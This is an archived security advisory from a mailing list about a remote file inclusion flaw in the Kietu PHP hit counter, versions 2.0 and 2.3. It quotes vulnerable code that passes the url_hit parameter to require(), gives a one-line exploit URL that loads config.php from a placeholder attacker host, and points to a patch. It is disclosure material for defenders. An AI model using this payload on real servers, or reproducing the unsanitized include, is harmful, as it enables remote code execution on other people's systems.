Informations : °°°°°°°°°°°°°° Website : http://kietu.free.fr Version : 2.0, 2.3 Problem : Include file PHP Code/Location : °°°°°°°°°°°°°°°°°°° hit.php : ------------------------------------------------------------------ if (!get_cfg_var("register_globals")) { $kietu["remote_addr"] = $HTTP_SERVER_VARS["REMOTE_ADDR"]; $kietu["http_user_agent"] = $HTTP_SERVER_VARS["HTTP_USER_AGENT"]; $kietu["website"] = $HTTP_GET_VARS["website"]; $kietu["appel"] = $HTTP_GET_VARS["appel"]; $kietu["http_referer"] = $HTTP_SERVER_VARS["HTTP_REFERER"]; $kietu["php_self"] = $HTTP_SERVER_VARS["PHP_SELF"]; $kietu["url_hit"] = $HTTP_GET_VARS["url_hit"].$url_hit; } else { $kietu["remote_addr"] = $REMOTE_ADDR; $kietu["http_user_agent"] = $HTTP_USER_AGENT; $kietu["website"] = $website; $kietu["appel"] = $appel; $kietu["http_referer"] = $HTTP_REFERER; $kietu["php_self"] = $PHP_SELF; $kietu["url_hit"] = $url_hit; } require ($kietu["url_hit"]."config.php"); ------------------------------------------------------------------ Exploit : °°°°°°°°° http://[target]/hit.php?url_hit=http://[attacker]/ with : http://[attacker]/config.php Patch : °°°°°°° A patch can be found on http://www.phpsecure.org More details : °°°°°°°°°°°°°° In French : http://www.frog-man.org/tutos/5holes8.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes8.txt&langpair=fr%7Cen&hl=fr&ie=ISO-8859-1&prev=%2Flanguage_tools This hole was published in "the Hackademy Journal 01", october 2002 (http://www.dmpfrance.com). frog-m@n _________________________________________________________________ MSN Search, le moteur de recherche qui pense comme vous ! http://search.fr.msn.be
This archive was generated by hypermail 2b30 : Mon Feb 17 2003 - 03:35:30 PST